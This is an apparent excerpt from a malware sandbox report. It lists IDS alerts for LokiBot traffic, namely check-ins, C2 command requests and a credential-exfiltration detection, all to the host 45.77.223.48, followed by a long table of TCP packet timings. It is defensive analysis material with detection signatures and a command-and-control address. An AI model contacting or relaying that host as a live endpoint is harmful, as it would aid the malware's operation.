                                            04/26/24-04:42:35.607137TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976380192.168.2.445.77.223.48
                                            04/26/24-04:42:39.893817TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976680192.168.2.445.77.223.48
                                            04/26/24-04:43:35.596260TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980380192.168.2.445.77.223.48
                                            04/26/24-04:43:35.596260TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980380192.168.2.445.77.223.48
                                            04/26/24-04:42:30.890483TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976080192.168.2.445.77.223.48
                                            04/26/24-04:42:54.249806TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.445.77.223.48
                                            04/26/24-04:43:29.172203TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980080192.168.2.445.77.223.48
                                            04/26/24-04:42:21.613500TCP2025381ET TROJAN LokiBot Checkin4975480192.168.2.445.77.223.48
                                            04/26/24-04:43:40.002816TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980580192.168.2.445.77.223.48
                                            04/26/24-04:42:35.607137TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.445.77.223.48
                                            04/26/24-04:43:44.358398TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980880192.168.2.445.77.223.48
                                            04/26/24-04:42:39.893817TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.445.77.223.48
                                            04/26/24-04:43:01.472637TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.445.77.223.48
                                            04/26/24-04:43:29.172203TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980080192.168.2.445.77.223.48
                                            04/26/24-04:42:15.814851TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.445.77.223.48
                                            04/26/24-04:42:30.890483TCP2025381ET TROJAN LokiBot Checkin4976080192.168.2.445.77.223.48
                                            04/26/24-04:43:48.980951TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981180192.168.2.445.77.223.48
                                            04/26/24-04:42:26.179565TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.445.77.223.48
                                            04/26/24-04:42:52.847994TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.445.77.223.48
                                            04/26/24-04:43:16.174844TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979180192.168.2.445.77.223.48
                                            04/26/24-04:43:08.959356TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978680192.168.2.445.77.223.48
                                            04/26/24-04:43:40.002816TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980580192.168.2.445.77.223.48
                                            04/26/24-04:42:43.312556TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976880192.168.2.445.77.223.48
                                            04/26/24-04:43:48.980951TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981180192.168.2.445.77.223.48
                                            04/26/24-04:42:43.312556TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976880192.168.2.445.77.223.48
                                            04/26/24-04:42:52.847994TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.445.77.223.48
                                            04/26/24-04:43:10.461205TCP2025381ET TROJAN LokiBot Checkin4978780192.168.2.445.77.223.48
                                            04/26/24-04:43:45.956580TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980980192.168.2.445.77.223.48
                                            04/26/24-04:42:51.405219TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.445.77.223.48
                                            04/26/24-04:43:38.519329TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980480192.168.2.445.77.223.48
                                            04/26/24-04:43:16.174844TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.445.77.223.48
                                            04/26/24-04:43:02.891159TCP2025381ET TROJAN LokiBot Checkin4978280192.168.2.445.77.223.48
                                            04/26/24-04:43:47.482327TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981080192.168.2.445.77.223.48
                                            04/26/24-04:42:23.188583TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975580192.168.2.445.77.223.48
                                            04/26/24-04:42:37.043735TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.445.77.223.48
                                            04/26/24-04:42:18.687770TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.445.77.223.48
                                            04/26/24-04:42:27.665907TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.445.77.223.48
                                            04/26/24-04:42:51.405219TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.445.77.223.48
                                            04/26/24-04:42:24.705958TCP2025381ET TROJAN LokiBot Checkin4975680192.168.2.445.77.223.48
                                            04/26/24-04:42:32.693379TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.445.77.223.48
                                            04/26/24-04:42:51.405219TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.445.77.223.48
                                            04/26/24-04:42:23.188583TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.445.77.223.48
                                            04/26/24-04:42:37.043735TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976480192.168.2.445.77.223.48
                                            04/26/24-04:42:17.251353TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.445.77.223.48
                                            04/26/24-04:42:46.212974TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.445.77.223.48
                                            04/26/24-04:43:44.358398TCP2025381ET TROJAN LokiBot Checkin4980880192.168.2.445.77.223.48
                                            04/26/24-04:43:26.329932TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979880192.168.2.445.77.223.48
                                            04/26/24-04:42:38.508836TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.445.77.223.48
                                            04/26/24-04:43:13.266385TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978980192.168.2.445.77.223.48
                                            04/26/24-04:42:12.565966TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.445.77.223.48
                                            04/26/24-04:42:05.836233TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973980192.168.2.445.77.223.48
                                            04/26/24-04:43:48.980951TCP2025381ET TROJAN LokiBot Checkin4981180192.168.2.445.77.223.48
                                            04/26/24-04:43:26.329932TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979880192.168.2.445.77.223.48
                                            04/26/24-04:43:13.266385TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.445.77.223.48
                                            04/26/24-04:42:10.160803TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.445.77.223.48
                                            04/26/24-04:42:55.707371TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.445.77.223.48
                                            04/26/24-04:42:39.893817TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.445.77.223.48
                                            04/26/24-04:42:21.613500TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975480192.168.2.445.77.223.48
                                            04/26/24-04:42:47.670237TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.445.77.223.48
                                            04/26/24-04:43:34.068335TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980280192.168.2.445.77.223.48
                                            04/26/24-04:42:04.426692TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14973680192.168.2.445.77.223.48
                                            04/26/24-04:42:21.613500TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975480192.168.2.445.77.223.48
                                            04/26/24-04:43:04.288590TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978380192.168.2.445.77.223.48
                                            04/26/24-04:43:04.288590TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978380192.168.2.445.77.223.48
                                            04/26/24-04:43:34.068335TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980280192.168.2.445.77.223.48
                                            04/26/24-04:42:04.426692TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24973680192.168.2.445.77.223.48
                                            04/26/24-04:42:29.146660TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.445.77.223.48
                                            04/26/24-04:43:41.435996TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980680192.168.2.445.77.223.48
                                            04/26/24-04:43:05.708325TCP2025381ET TROJAN LokiBot Checkin4978480192.168.2.445.77.223.48
                                            04/26/24-04:42:08.768305TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974180192.168.2.445.77.223.48
                                            04/26/24-04:43:02.891159TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978280192.168.2.445.77.223.48
                                            04/26/24-04:43:02.891159TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978280192.168.2.445.77.223.48
                                            04/26/24-04:43:52.043341TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.2.445.77.223.48
                                            04/26/24-04:42:08.768305TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974180192.168.2.445.77.223.48
                                            04/26/24-04:43:47.482327TCP2025381ET TROJAN LokiBot Checkin4981080192.168.2.445.77.223.48
                                            04/26/24-04:43:19.056808TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.445.77.223.48
                                            04/26/24-04:43:27.753457TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979980192.168.2.445.77.223.48
                                            04/26/24-04:43:30.595490TCP2025381ET TROJAN LokiBot Checkin4980180192.168.2.445.77.223.48
                                            04/26/24-04:43:20.496255TCP2025381ET TROJAN LokiBot Checkin4979480192.168.2.445.77.223.48
                                            04/26/24-04:43:27.753457TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979980192.168.2.445.77.223.48
                                            04/26/24-04:43:50.432496TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981280192.168.2.445.77.223.48
                                            04/26/24-04:43:24.904349TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.445.77.223.48
                                            04/26/24-04:43:23.393350TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979680192.168.2.445.77.223.48
                                            04/26/24-04:43:38.519329TCP2025381ET TROJAN LokiBot Checkin4980480192.168.2.445.77.223.48
                                            04/26/24-04:43:50.432496TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981280192.168.2.445.77.223.48
                                            04/26/24-04:43:10.461205TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978780192.168.2.445.77.223.48
                                            04/26/24-04:43:11.850756TCP2025381ET TROJAN LokiBot Checkin4978880192.168.2.445.77.223.48
                                            04/26/24-04:43:41.435996TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980680192.168.2.445.77.223.48
                                            04/26/24-04:42:30.890483TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976080192.168.2.445.77.223.48
                                            04/26/24-04:43:35.596260TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980380192.168.2.445.77.223.48
                                            04/26/24-04:42:30.890483TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976080192.168.2.445.77.223.48
                                            04/26/24-04:43:29.172203TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980080192.168.2.445.77.223.48
                                            04/26/24-04:42:52.847994TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.445.77.223.48
                                            04/26/24-04:42:44.797094TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.445.77.223.48
                                            04/26/24-04:42:05.836233TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973980192.168.2.445.77.223.48
                                            04/26/24-04:42:15.814851TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.445.77.223.48
                                            04/26/24-04:43:08.959356TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978680192.168.2.445.77.223.48
                                            04/26/24-04:42:07.242464TCP2025381ET TROJAN LokiBot Checkin4974080192.168.2.445.77.223.48
                                            04/26/24-04:42:54.249806TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.445.77.223.48
                                            04/26/24-04:42:43.312556TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976880192.168.2.445.77.223.48
                                            04/26/24-04:43:00.052049TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.445.77.223.48
                                            04/26/24-04:43:08.959356TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978680192.168.2.445.77.223.48
                                            04/26/24-04:43:17.632927TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.2.445.77.223.48
                                            04/26/24-04:42:15.814851TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.445.77.223.48
                                            04/26/24-04:43:17.632927TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979280192.168.2.445.77.223.48
                                            04/26/24-04:43:45.956580TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980980192.168.2.445.77.223.48
                                            04/26/24-04:43:45.956580TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980980192.168.2.445.77.223.48
                                            TimestampSource PortDest PortSource IPDest IP
                                            Apr 26, 2024 04:42:02.744220018 CEST4973580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:02.933562040 CEST804973545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:02.933651924 CEST4973580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:02.935480118 CEST4973580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:03.130639076 CEST804973545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:03.130712032 CEST4973580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:03.319757938 CEST804973545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:04.099225044 CEST804973545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:04.099363089 CEST4973580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:04.099849939 CEST804973545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:04.099910975 CEST4973580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:04.099992037 CEST804973545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:04.100044966 CEST4973580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:04.109543085 CEST804973545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:04.109600067 CEST4973580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:04.109834909 CEST804973545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:04.109879971 CEST4973580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:04.110028028 CEST804973545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:04.110044003 CEST804973545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:04.110073090 CEST4973580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:04.110089064 CEST4973580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:04.110208035 CEST804973545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:04.110248089 CEST4973580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:04.110270977 CEST804973545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:04.110311031 CEST4973580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:04.110337973 CEST804973545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:04.110378981 CEST4973580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:04.234833956 CEST4973680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:04.287754059 CEST804973545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:04.287851095 CEST4973580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:04.287906885 CEST804973545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:04.287955046 CEST4973580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:04.288305044 CEST804973545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:04.288342953 CEST4973580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:04.424607992 CEST804973645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:04.424679995 CEST4973680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:04.426692009 CEST4973680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:04.614244938 CEST804973645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:04.614386082 CEST4973680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:04.802763939 CEST804973645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:05.587521076 CEST804973645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:05.587621927 CEST4973680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:05.587862015 CEST804973645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:05.587908983 CEST4973680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:05.587946892 CEST804973645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:05.587989092 CEST4973680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:05.598576069 CEST804973645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:05.598642111 CEST4973680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:05.599412918 CEST804973645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:05.599459887 CEST4973680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:05.599534035 CEST804973645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:05.599581957 CEST4973680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:05.599654913 CEST804973645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:05.599695921 CEST4973680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:05.600627899 CEST804973645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:05.600692987 CEST804973645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:05.600716114 CEST4973680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:05.600725889 CEST4973680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:05.600725889 CEST804973645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:05.600784063 CEST4973680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:05.644999981 CEST4973980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:05.776321888 CEST804973645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:05.776369095 CEST4973680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:05.776479006 CEST804973645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:05.776494026 CEST804973645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:05.776514053 CEST4973680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:05.776556969 CEST4973680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:05.834322929 CEST804973945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:05.834388971 CEST4973980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:05.836232901 CEST4973980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:06.025075912 CEST804973945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:06.025144100 CEST4973980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:06.213613987 CEST804973945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:06.904539108 CEST804973945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:06.904690981 CEST804973945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:06.904705048 CEST804973945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:06.904776096 CEST4973980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:06.904776096 CEST4973980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:06.905072927 CEST4973980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:06.912899017 CEST804973945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:06.913083076 CEST804973945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:06.913151979 CEST4973980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:06.913151979 CEST4973980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:06.913249969 CEST804973945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:06.913366079 CEST804973945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:06.913434982 CEST4973980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:06.913434982 CEST4973980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:06.913522005 CEST804973945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:06.913640022 CEST804973945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:06.913676977 CEST804973945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:06.913701057 CEST4973980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:06.913722992 CEST4973980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:07.053894997 CEST4974080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:07.094361067 CEST804973945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:07.094443083 CEST4973980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:07.094449997 CEST804973945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:07.094504118 CEST4973980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:07.094532013 CEST804973945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:07.094583988 CEST4973980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:07.240298033 CEST804974045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:07.240515947 CEST4974080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:07.242464066 CEST4974080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:07.429253101 CEST804974045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:07.429464102 CEST4974080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:07.616425037 CEST804974045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:08.444988012 CEST804974045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:08.445014000 CEST804974045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:08.445091963 CEST4974080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:08.445174932 CEST4974080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:08.445220947 CEST804974045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:08.445271969 CEST4974080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:08.471952915 CEST804974045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:08.472017050 CEST4974080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:08.472357035 CEST804974045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:08.472412109 CEST4974080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:08.472496033 CEST804974045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:08.472587109 CEST4974080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:08.472635984 CEST804974045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:08.472681046 CEST4974080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:08.473453045 CEST804974045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:08.473515034 CEST4974080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:08.473562956 CEST804974045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:08.473607063 CEST4974080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:08.473640919 CEST804974045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:08.473685980 CEST4974080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:08.577286005 CEST4974180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:08.631520033 CEST804974045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:08.631598949 CEST4974080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:08.631602049 CEST804974045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:08.631656885 CEST4974080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:08.766238928 CEST804974145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:08.766350031 CEST4974180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:08.768305063 CEST4974180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:08.956935883 CEST804974145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:08.957061052 CEST4974180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:09.145184994 CEST804974145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:09.833314896 CEST804974145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:09.833411932 CEST804974145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:09.833451986 CEST804974145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:09.833499908 CEST4974180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:09.833590031 CEST4974180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:09.841272116 CEST804974145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:09.841339111 CEST4974180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:09.841691017 CEST804974145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:09.841747999 CEST4974180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:09.841867924 CEST804974145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:09.841908932 CEST804974145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:09.841919899 CEST4974180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:09.841954947 CEST4974180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:09.842154026 CEST804974145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:09.842207909 CEST4974180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:09.842238903 CEST804974145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:09.842292070 CEST4974180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:09.842323065 CEST804974145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:09.842374086 CEST4974180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:09.971904993 CEST4974280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:10.158895969 CEST804974245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:10.159020901 CEST4974280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:10.160803080 CEST4974280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:10.349966049 CEST804974245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:10.350081921 CEST4974280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:10.539710045 CEST804974245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:11.220868111 CEST804974245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:11.220902920 CEST804974245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:11.221009016 CEST4974280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:11.221091032 CEST4974280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:11.221327066 CEST804974245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:11.221396923 CEST4974280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:11.221472979 CEST804974245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:11.221555948 CEST4974280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:11.230864048 CEST804974245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:11.230925083 CEST4974280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:11.231679916 CEST804974245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:11.231738091 CEST4974280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:11.231879950 CEST804974245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:11.231937885 CEST804974245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:11.231941938 CEST4974280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:11.231998920 CEST4974280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:11.232424021 CEST804974245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:11.232480049 CEST4974280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:11.232522964 CEST804974245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:11.232574940 CEST4974280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:11.364975929 CEST4974380192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:11.409898043 CEST804974245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:11.409966946 CEST4974280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:11.410187006 CEST804974245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:42:11.410242081 CEST4974280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:12.376254082 CEST4974380192.168.2.445.77.223.48
                                            Apr 26, 2024 04:42:12.563710928 CEST804974345.77.223.48192.168.2.4
